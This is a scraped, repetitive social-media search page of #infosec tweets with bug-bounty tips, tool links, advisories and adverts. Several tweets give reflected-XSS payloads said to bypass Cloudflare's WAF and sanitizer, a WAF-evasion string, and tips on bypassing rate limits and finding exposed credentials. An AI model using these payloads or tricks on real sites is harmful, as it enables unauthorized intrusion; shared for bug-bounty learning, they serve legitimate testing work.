#infosec 搜尋結果

Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS

bughuntar's tweet image. Cloudflare WAF Bypass → XSS 💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#CyberSecurity #InfoSec #BugBounty #XSS…

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #infosec

0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec
0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec

Cloudflare Workers proxy for IP rotation and URL redirection - github.com/MrTurvey/flare… HTTP pass-through proxies for unique IP rotation, similar to fireprox #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Cloudflare Workers proxy for IP rotation and URL redirection

- github.com/MrTurvey/flare…

HTTP pass-through proxies for unique IP rotation, similar to fireprox

#infosec #cybersec #bugbountytips

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

ofjaaah's tweet image. Use NextJS? Recon ✨

A quick way to find &quot;all&quot; paths for Next.js websites:
DevTools-&amp;gt;Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join(&apos;\n&apos;));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips

The payload contains '|/???/\b**\h,' which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. image by: win3zz #cybersec #BugBountytips #infosec

0x0SojalSec's tweet image. The payload contains &apos;|/???/\b**\h,&apos; which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. 

image by:  win3zz

#cybersec #BugBountytips #infosec

New XSS Bypass Cloudflare WAF Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #BugBounty #bugbountytips #infosec

viehgroup's tweet image. New XSS Bypass Cloudflare WAF

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E 

#BugBounty #bugbountytips #infosec

FIRST DAY SALES KICKOFF! 🚀 Thanks to the global #BugBounty community! 🌍 We saw massive adoption from 5+ countries in 24 hours. The toolkit is solving real-world recon and secret-finding problems. Ready to level up? 👇 ➡️ cybersecurity.tabbeqai.com/Cybersecurity/ #InfoSec #Cybersecurity

kassem_S94's tweet image. FIRST DAY SALES KICKOFF! 🚀

Thanks to the global #BugBounty community! 🌍 We saw massive adoption from 5+ countries in 24 hours.

The toolkit is solving real-world recon and secret-finding problems.

Ready to level up? 👇
➡️ cybersecurity.tabbeqai.com/Cybersecurity/

#InfoSec #Cybersecurity
kassem_S94's tweet image. FIRST DAY SALES KICKOFF! 🚀

Thanks to the global #BugBounty community! 🌍 We saw massive adoption from 5+ countries in 24 hours.

The toolkit is solving real-world recon and secret-finding problems.

Ready to level up? 👇
➡️ cybersecurity.tabbeqai.com/Cybersecurity/

#InfoSec #Cybersecurity
kassem_S94's tweet image. FIRST DAY SALES KICKOFF! 🚀

Thanks to the global #BugBounty community! 🌍 We saw massive adoption from 5+ countries in 24 hours.

The toolkit is solving real-world recon and secret-finding problems.

Ready to level up? 👇
➡️ cybersecurity.tabbeqai.com/Cybersecurity/

#InfoSec #Cybersecurity
kassem_S94's tweet image. FIRST DAY SALES KICKOFF! 🚀

Thanks to the global #BugBounty community! 🌍 We saw massive adoption from 5+ countries in 24 hours.

The toolkit is solving real-world recon and secret-finding problems.

Ready to level up? 👇
➡️ cybersecurity.tabbeqai.com/Cybersecurity/

#InfoSec #Cybersecurity

Our virtual CISO service is perfect for organisations that can’t justify employing a full time Chief Information Security Officer but still want to prioritise cyber security. Here’s how we can help your business: spritzmonkey.com/vciso #CyberSecurity #InfoSec #Spritzmonkey

SpritzmonkeyLtd's tweet image. Our virtual CISO service is perfect for organisations that can’t justify employing a full time Chief Information Security Officer but still want to prioritise cyber security.

Here’s how we can help your business: spritzmonkey.com/vciso

#CyberSecurity #InfoSec #Spritzmonkey

Alert: North Korean crypto thefts are evolving — bigger hacks, stealthier tactics. If you hold crypto, this is essential reading. 🔒 Read now: cyberupdates365.com/north-korean-c… #Infosec #CryptoSecurity #Crypto #etherum


Every great defender (or ethical hacker 👀) knows your tools can make or break your mission. 💬 Share this with your network. You might help someone discover their next favourite tool. Drop your favorites below 👇 #CyberSecurity #InfoSec #EthicalHacking #PenTesting

CSec88's tweet image. Every great defender (or ethical hacker 👀) knows your tools can make or break your mission.  💬   
 Share this with your network. You might help someone discover their next favourite tool.  Drop your favorites below 👇  #CyberSecurity #InfoSec #EthicalHacking #PenTesting

2 ans après sa découverte, la campagne de Cyberspionnage par clés USB infectées (potentiellement distribuées lors de salons professionnels) menée par le groupe de Hackers chinois Mustang Panda continue de hanter l'industrie maritime #Infosec #Malwares clubic.com/actualite-5826…


CVE-2025-9231 surges to second place with 17.8% of Android exploit activity; full breakdown available here: android-exploits.org/home/ Created by AI. #Android #CyberThreats #InfoSec


Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks. Debian LTS Advisory DLA 432... #DebianLTS #Linux #infosec #opensource #linuxsecurity tinyurl.com/24cxytw9

LS_Advisories's tweet image. Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks. Debian LTS Advisory DLA 432... #DebianLTS #Linux #infosec #opensource #linuxsecurity tinyurl.com/24cxytw9

Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners PDF: 0xinfection.github.io/reversing/reve… author: @0xInfection #infosec #reverseengineering

mqst_'s tweet image. 🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners

PDF: 0xinfection.github.io/reversing/reve…

author: @0xInfection 

#infosec #reverseengineering
mqst_'s tweet image. 🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners

PDF: 0xinfection.github.io/reversing/reve…

author: @0xInfection 

#infosec #reverseengineering

Cloudflare Workers proxy for IP rotation and URL redirection - github.com/MrTurvey/flare… HTTP pass-through proxies for unique IP rotation, similar to fireprox #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Cloudflare Workers proxy for IP rotation and URL redirection

- github.com/MrTurvey/flare…

HTTP pass-through proxies for unique IP rotation, similar to fireprox

#infosec #cybersec #bugbountytips

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips

[Blog] my journey as a @Microsoft Security Researcher! 🚀 Tips, learnings & insights for anyone aspiring to land their dream role in cybersecurity. 🔗 shreyapohekar.com/blogs/landing-… #Microsoft #Infosec #FreshersInTech #SecurityResearch #security

shreyapohekar's tweet image. [Blog] my journey as a @Microsoft  Security Researcher! 🚀
Tips, learnings &amp;amp; insights for anyone aspiring to land their dream role in cybersecurity.
🔗 shreyapohekar.com/blogs/landing-…

#Microsoft #Infosec #FreshersInTech #SecurityResearch #security

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure

mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure
mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure

The payload contains '|/???/\b**\h,' which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. image by: win3zz #cybersec #BugBountytips #infosec

0x0SojalSec's tweet image. The payload contains &apos;|/???/\b**\h,&apos; which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. 

image by:  win3zz

#cybersec #BugBountytips #infosec

Exploiting libANGLE integer underflow vulnerability to read the Chrome WebGPU process qriousec.github.io/post/oob-angle/ Credits @qriousec #infosec #chrome

0xor0ne's tweet image. Exploiting libANGLE integer underflow vulnerability to read the Chrome WebGPU process

qriousec.github.io/post/oob-angle/

Credits @qriousec

#infosec #chrome
0xor0ne's tweet image. Exploiting libANGLE integer underflow vulnerability to read the Chrome WebGPU process

qriousec.github.io/post/oob-angle/

Credits @qriousec

#infosec #chrome

Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #infosec

0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec
0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec

Loading...

Something went wrong.


Something went wrong.


United States Trends